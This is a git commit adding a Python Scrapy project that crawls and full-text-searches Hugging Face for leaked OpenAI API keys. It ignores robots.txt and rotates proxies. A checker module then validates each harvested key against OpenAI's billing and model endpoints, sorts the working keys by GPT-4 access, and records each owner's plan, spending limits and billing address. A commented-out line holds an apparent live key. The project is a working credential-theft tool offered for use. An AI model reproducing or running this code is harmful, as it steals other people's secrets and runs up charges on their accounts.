add files

This commit is contained in:
Cyberes 2023-07-23 18:11:48 -06:00
parent 2bfc6bb538
commit 15759586e4
17 changed files with 627 additions and 1 deletions

3
.gitignore vendored
View File

@ -1,3 +1,5 @@
.idea
# ---> Python
# Byte-compiled / optimized / DLL files
__pycache__/
@ -159,4 +161,3 @@ cython_debug/
# and can be added to the global gitignore or merged into this file. For a more nuclear
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
#.idea/

0
huggingface/__init__.py Normal file
View File

75
huggingface/check-keys.py Normal file
View File

@ -0,0 +1,75 @@
import argparse
import concurrent
from concurrent.futures import ThreadPoolExecutor
from pathlib import Path
from keychecker.check import check_key
def process_key(key):
result = check_key(key)
if not len(result['errors']):
if result['has_gpt_4'] or result['has_only_turbo'] or result['has_gpt_4_32k']:
print(result)
return result
return None
def main():
parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
parser.add_argument('input_file', help='Path to the file containing the keys.')
args = parser.parse_args()
input_file = Path(args.input_file).resolve().absolute()
if not input_file.exists():
print('Input file does not exist:', input_file)
quit(1)
with open(input_file) as f:
content = set(f.read().splitlines())
# content = ['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']
gpt_4 = set()
gpt_4_32k = set()
gpt_3 = set()
with ThreadPoolExecutor(max_workers=50) as executor:
results = executor.map(process_key, content)
for result in results:
if result is not None:
if result['has_gpt_4']:
gpt_4.add(result['api_key'])
if result['has_gpt_4_32k']:
gpt_4_32k.add(result['api_key'])
if result['has_only_turbo']:
gpt_3.add(result['api_key'])
print('')
print('GPT4 KEYS:')
if not len(gpt_4):
print('none')
else:
for key in gpt_4:
print(key)
print('')
print('GPT4-32k KEYS:')
if not len(gpt_4_32k):
print('none')
else:
for key in gpt_4_32k:
print(key)
print('')
print('GPT3 KEYS:')
if not len(gpt_3):
print('none')
else:
for key in gpt_3:
print(key)
if __name__ == "__main__":
main()

View File

@ -0,0 +1,11 @@
import coloredlogs
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from huggingface.spiders.search import HFSearchSpider
if __name__ == "__main__":
process = CrawlerProcess(get_project_settings())
process.crawl(HFSearchSpider)
process.start()

10
huggingface/crawl-site.py Normal file
View File

@ -0,0 +1,10 @@
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from huggingface.spiders.huggingface import HuggingfaceSpider
if __name__ == "__main__":
process = CrawlerProcess(get_project_settings())
process.crawl(HuggingfaceSpider)
process.start()

View File

View File

@ -0,0 +1,12 @@
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class HuggingfaceItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass

View File

@ -0,0 +1,128 @@
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
# useful for handling different item types with a single interface
class HuggingfaceSpiderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, or item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Request or item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesnt have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info("Spider opened: %s" % spider.name)
class HuggingfaceDownloaderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info("Spider opened: %s" % spider.name)
from itertools import cycle
from scrapy import signals
from scrapy.exceptions import NotConfigured
class RoundRobinProxyMiddleware:
def __init__(self, proxies):
if not proxies:
raise NotConfigured
self.proxies = cycle(proxies)
@classmethod
def from_crawler(cls, crawler):
proxies = crawler.settings.getlist('PROXIES')
if not proxies:
raise NotConfigured
return cls(proxies)
def process_request(self, request, spider):
request.meta['proxy'] = next(self.proxies)
def process_exception(self, request, exception, spider):
request.meta['proxy'] = next(self.proxies)
return request

View File

@ -0,0 +1,35 @@
from scrapy import Field, Item
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
class HuggingfacePipeline:
def process_item(self, item, spider):
return item
class FoundItem(Item):
url = Field()
matches = Field()
class FilePipeline:
def open_spider(self, spider):
self.file = open(spider.filename or 'items.txt', 'w')
def close_spider(self, spider):
self.file.close()
def process_item(self, item, spider):
# line = f"URL: {item['url']}, Matches: {item['matches']}\n"
for m in item['matches']:
self.file.write(m + '\n')
self.file.flush() # Ensure the data is written to the disk immediately
return item

View File

@ -0,0 +1,103 @@
# Scrapy settings for huggingface project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = "huggingface"
SPIDER_MODULES = ["huggingface.spiders"]
NEWSPIDER_MODULE = "huggingface.spiders"
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = "'Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.130 Mobile/15E148 Safari/604.1'"
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
CONCURRENT_REQUESTS = 100
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY = 0
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
# TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
# "Accept-Language": "en",
# }
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# "huggingface.middlewares.HuggingfaceSpiderMiddleware": 543,
# }
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
"huggingface.middlewares.RoundRobinProxyMiddleware": 100,
}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# "scrapy.extensions.telnet.TelnetConsole": None,
# }
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
"huggingface.pipelines.FilePipeline": 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = "httpcache"
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = "scrapy.extensions.httpcache.FilesystemCacheStorage"
# Set settings whose default value is deprecated to a future-proof value
REQUEST_FINGERPRINTER_IMPLEMENTATION = "2.7"
TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
FEED_EXPORT_ENCODING = "utf-8"
PROXIES = [
"http://172.0.4.7:3128",
"http://172.0.4.8:3128",
"http://172.0.4.10:3128",
"http://172.0.4.12:3128",
]
LOG_LEVEL = 'CRITICAL'
HTTPCACHE_ENABLED = True

View File

@ -0,0 +1,4 @@
# This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.

View File

@ -0,0 +1,35 @@
import logging
import re
import time
import coloredlogs
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..pipelines import FoundItem
class HuggingfaceSpider(CrawlSpider):
name = "huggingface"
allowed_domains = ["huggingface.co"]
start_urls = ["https://huggingface.co/"]
logger = logging.getLogger('HFSearchSpider')
logger.setLevel(logging.DEBUG)
coloredlogs.install(logger=logger, level=logging.DEBUG)
rules = (
Rule(LinkExtractor(allow_domains=allowed_domains), callback='parse_start_url', follow=True),
)
def __init__(self, *args, **kwargs):
super(HuggingfaceSpider, self).__init__(*args, **kwargs)
self.regex = re.compile(r'sk-[a-zA-Z0-9]{47}')
self.filename = f'found-keys-site-{int(time.time())}.txt'
def parse_start_url(self, response):
self.logger.debug(f"Status: {response.status}, URL: {response.url}")
text = response.text
matches = self.regex.findall(text)
if matches:
self.logger.error(f"{matches}")
return FoundItem(url=response.url, matches=matches)

View File

@ -0,0 +1,31 @@
import logging
import re
import time
import coloredlogs
import scrapy
from ..pipelines import FoundItem
class HFSearchSpider(scrapy.Spider):
name = "huggingface_search"
allowed_domains = ["huggingface.co"]
start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
logger = logging.getLogger('HFSearchSpider')
logger.setLevel(logging.DEBUG)
coloredlogs.install(logger=logger, level=logging.DEBUG)
def __init__(self, *args, **kwargs):
super(HFSearchSpider, self).__init__(*args, **kwargs)
self.filename = f'found-keys-{int(time.time())}.txt'
def parse(self, response):
self.logger.debug(f"Status: {response.status}, URL: {response.url}")
keys = re.findall(r'(sk-.)</span>([a-zA-Z0-9]{47})', response.text)
found_keys = set()
for key in keys:
found_keys.add(''.join(key))
if len(found_keys):
self.logger.error(f"{found_keys}")
yield FoundItem(url=response.url, matches=found_keys)

View File

View File

@ -0,0 +1,165 @@
# -*- coding: utf-8 -*-
import logging
import threading
import time
from datetime import datetime
import openai
import requests
desired_models = ["gpt-3.5-turbo", "gpt-4", "gpt-4-32k"]
def list_models(api_key):
openai.api_key = api_key
models = openai.Model.list()
return [model.id for model in models['data']]
def filter_models(models):
return [model for model in models if model in desired_models]
def get_limits(api_key):
headers = {
"authorization": f"Bearer {api_key}",
"Referer": "https://platform.openai.com/account/usage",
}
response = requests.get("https://api.openai.com/dashboard/billing/subscription", headers=headers)
if response.status_code == 200:
return True, response.json()
else:
return False, response.text
key_test_lock = threading.Lock()
def try_complete(api_key):
with key_test_lock:
openai.api_key = api_key
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
max_tokens=1,
messages=[{'role': 'user', 'content': ''}]
)
# def test_key(api_key):
# # with key_test_lock: # not 100% sure it's thread-safe
# openai.api_key = api_key
# try:
# response = openai.Completion.create(
# engine="gpt-3.5-turbo",
# prompt='Hello there!',
# max_tokens=100
# )
# print(response.choices[0].text.strip())
# return True
# except Exception as e:
# print(f"An error occurred: {e}")
# return False
def check_key(api_key, retry_count=3):
result = f"{api_key}\n"
has_gpt_4_32k = False
model_ids = []
errors = []
usage_and_limits_success, usage_and_limits = get_limits(api_key)
if not usage_and_limits_success:
return {
'key': api_key,
'has_gpt_4': None,
'has_gpt_4_32k': None,
'has_only_turbo': None,
'org_id': None,
'soft_limit_usd': None,
'hard_limit_usd': None,
'access_until': None, # .strftime('%Y-%m-%d %H:%M:%S'),
'plan': None,
'plan_id': None,
'address': None,
'errors': usage_and_limits
}
if usage_and_limits is None:
logging.error(f"Failed to get usage and limits for API key {api_key}")
return
plan = usage_and_limits.get('plan')
if plan is None:
plan_title = ''
plan_id = ''
else:
plan_title = plan.get('title', '')
plan_id = plan.get('id', '')
access_until = datetime.fromtimestamp(usage_and_limits['access_until'])
org_id = usage_and_limits.get('account_name', '')
billing_address = usage_and_limits.get('billing_address', {})
if billing_address is not None:
billing_country = billing_address.get('country', '')
billing_city = billing_address.get('city', '')
else:
billing_country = ''
billing_city = ''
is_canceled = usage_and_limits.get('canceled', False)
canceled_at_raw = usage_and_limits.get('canceled_at', '')
canceled_at = datetime.fromtimestamp(canceled_at_raw) if canceled_at_raw is not None else None
models = list_models(api_key)
filtered_models = filter_models(models)
if filtered_models:
for model_id in filtered_models:
result += f" - {model_id}\n"
model_ids.append(model_id)
else:
result += " No desired models available.\n"
has_gpt_4 = "gpt-4" in model_ids
has_gpt_4_32k = "gpt-4-32k" in model_ids
has_only_turbo = "gpt-3.5-turbo" in model_ids and not has_gpt_4
try:
for attempts in range(retry_count):
try:
try_complete(api_key)
break
except Exception as e:
error_message = str(e)
if "The server is overloaded or not ready yet" in error_message:
logging.info(f'Error encountered when generating a completion on attempt {attempts + 1}: {error_message}. Retrying...')
time.sleep(5)
continue
else:
raise e
except Exception as e:
error_message = str(e)
if "You exceeded your current quota" in error_message and is_canceled:
errors.append('You exceeded your current quota')
elif "You exceeded your current quota" in error_message and not is_canceled:
errors.append('This key has exceeded its current quota')
elif "Your account is not active" in error_message:
errors.append('Error: Your account is not active, please check your billing details on our website.')
else:
errors.append(error_message)
# api_key_works = test_key(api_key)
return {
'api_key': api_key,
# 'api_key_works': api_key_works,
'has_gpt_4': has_gpt_4,
'has_gpt_4_32k': has_gpt_4_32k,
'has_only_turbo': has_only_turbo,
'org_id': org_id,
'soft_limit_usd': usage_and_limits['soft_limit_usd'],
'hard_limit_usd': float(usage_and_limits['hard_limit_usd']),
'access_until': access_until, # .strftime('%Y-%m-%d %H:%M:%S'),
'plan': plan_title,
'plan_id': plan_id,
'address': f'{billing_country}, {billing_city}',
'errors': errors
}

11
huggingface/scrapy.cfg Normal file
View File

@ -0,0 +1,11 @@
# Automatically created by: scrapy startproject
#
# For more information about the [deploy] section see:
# https://scrapyd.readthedocs.io/en/latest/deploy.html
[settings]
default = huggingface.settings
[deploy]
#url = http://localhost:6800/
project = huggingface

5
requirements.txt Normal file
View File

@ -0,0 +1,5 @@
beautifulsoup4
requests
scrapy
coloredlogs
openai